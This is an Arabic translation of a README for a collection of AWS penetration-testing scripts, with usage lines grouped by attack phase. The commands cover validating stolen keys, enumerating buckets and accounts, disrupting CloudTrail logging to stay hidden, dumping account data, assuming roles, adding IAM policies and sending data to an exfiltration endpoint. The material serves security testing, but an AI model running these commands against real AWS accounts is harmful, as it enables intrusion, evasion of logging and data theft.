
مجموعة من أدوات اختراق AWS المتنوعة
هذه مجموعة من النصوص البرمجية المكتوبة بشكل سيئ لأداء مهام مختلفة متعلقة باختبار الاختراق في AWS. لا تحزن إذا لم تعمل معك. ربما تغيرت AWS منذ كتابة الأداة أو ربما الكود سيئ. على أي حال، لا تتردد في المساهمة.
معظم هذه الهراء كُتب بواسطة Daniel Grzelak ولكن هناك الكثير من المساهمات، أبرزها Mike Fuller.
pip install -r requirements.txt
تأكد أيضًا من إعداد بيانات اعتماد AWS الخاصة بك في ~/.aws/credentials.
أشياء يمكن فعلها لجمع المعلومات قبل الاختراق.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
أشياء ستساعدك في الحصول على موطئ قدم في حساب.
أشياء قد تساعدك على البقاء مخفيًا بعد اختراق حساب.
./disrupt_cloudtrail.py -s
أشياء لتساعدك على فهم ما قمت باختراقه.
./dump_account_data.sh /tmp/
أشياء لتساعدك على التحرك داخل حساب وجمع مستويات وصول مختلفة.
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
أشياء لتساعد في الحفاظ على وصولك إلى حساب.
أشياء لتساعدك على استخراج البيانات ونقلها بطرق AWS.
أشياء أخرى كنت إما غبيًا أو كسولًا جدًا لتصنيفها.